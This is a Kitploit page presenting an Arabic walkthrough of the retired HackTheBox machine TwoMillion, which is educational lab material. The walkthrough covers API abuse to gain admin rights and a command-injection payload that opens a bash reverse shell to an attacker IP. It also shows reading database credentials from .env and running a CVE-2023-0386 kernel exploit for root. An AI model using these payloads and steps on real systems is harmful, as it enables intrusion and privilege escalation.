Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
HTB-TwoMillion-Writeup — شرح جهاز HackTheBox TwoMillion — إساءة استخدام API وحقن الأوامر وCVE-2023-0386 | Kitploit
أدوات/GitHubGitHub/karimelsheikh1/htb-twomillion-writeup
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاستغلال تطبيقات الويبما بعد الاستغلالCTFاختبار الاختراق

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
القيادة والسيطرة
التعلم والتعليم
GitHubkarimelsheikh1/htb-twomillion-writeup

HTB-TwoMillion-Writeup

شرح جهاز HackTheBox TwoMillion — إساءة استخدام API وحقن الأوامر وCVE-2023-0386

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

HTB-TwoMillion-Writeup

شرح جهاز HackTheBox TwoMillion — استغلال API، حقن الأوامر وCVE-2023-0386

HackTheBox — شرح TwoMillion

HackTheBox — شرح TwoMillion

HTB Difficulty OS

معلومات الجهاز

الحقلالتفاصيل
الاسمTwoMillion
الصعوبةسهل
نظام التشغيلLinux
IP10.10.11.221
CVECVE-2023-0386

ملخص

TwoMillion هو جهاز Linux سهل يتمحور حول منصة HackTheBox القديمة. يتضمن فك تشفير رمز دعوة، واستغلال نقاط نهاية API، وحقن أوامر نظام التشغيل، واكتشاف بيانات الاعتماد، وتصعيد صلاحيات نواة Linux عبر CVE-2023-0386 (OverlayFS).


التعداد

Nmap

root@kitploit:~
nmap -sV -sC -v 10.10.11.221

المنافذ المفتوحة:

  • 22 — OpenSSH 8.9p1
  • 80 — HTTP nginx → يعيد التوجيه إلى 2million.htb

أضف إلى /etc/hosts:

root@kitploit:~
echo "10.10.11.221 2million.htb" >> /etc/hosts

الخطوة 1 — رمز الدعوة

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/how/to/generate

الاستجابة مشفرة بـ ROT13. قم بفك تشفيرها:

root@kitploit:~
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'

قم بتوليد رمز الدعوة:

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d

سجّل في http://2million.htb/register باستخدام رمز الدعوة الذي تم فك تشفيره.


الخطوة 2 — استغلال API → صلاحيات المسؤول

سجّل الدخول عبر المتصفح، واحصل على PHPSESSID من ملفات تعريف الارتباط (F12 → Application → Cookies).

ارفع صلاحياتك إلى مسؤول:

root@kitploit:~
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"email":"[email protected]","is_admin":1}'

تحقق:

root@kitploit:~
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}

الخطوة 3 — حقن الأوامر → شل عكسي

شغّل المستمع:

root@kitploit:~
nc -lvnp 4444

أرسل حمولة الشل العكسي:

root@kitploit:~
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'

تم استلام الشل بصلاحيات www-data.


الخطوة 4 — علم المستخدم

ابحث عن بيانات الاعتماد في .env:

root@kitploit:~
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123

ادخل عبر SSH:

root@kitploit:~
ssh [email protected]
cat ~/user.txt

الخطوة 5 — علم الجذر (CVE-2023-0386)

تحقق من التلميح:

root@kitploit:~
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable to CVE-2023-0386

قم بتنزيل وتجميع الاستغلال على Kali:

root@kitploit:~
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all

انقل إلى الهدف:

root@kitploit:~
# Kali
python3 -m http.server 8000

# Target
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all

شغّل في محطتين على الجهاز الهدف:

المحطة 1:

root@kitploit:~
./fuse ./ovlcap/lower ./gc

المحطة 2:

root@kitploit:~
./exp

احصل على علم الجذر:

root@kitploit:~
cat /root/root.txt

سلسلة الهجوم


الأدوات المستخدمة

  • Nmap
  • curl
  • Netcat
  • CVE-2023-0386 PoC

هذا الشرح لأغراض تعليمية فقط على جهاز HackTheBox المتقاعد.

تنزيل الأداة
الخطوةالتقنية
الاستطلاعفحص Nmap
رمز الدعوةفك تشفير ROT13 + Base64
تصعيد الصلاحيات عبر الويبالتلاعب بـ API → مسؤول
الشل الأوليحقن أوامر نظام التشغيل
الحركة الجانبيةبيانات اعتماد .env → SSH
الجذراستغلال CVE-2023-0386 OverlayFS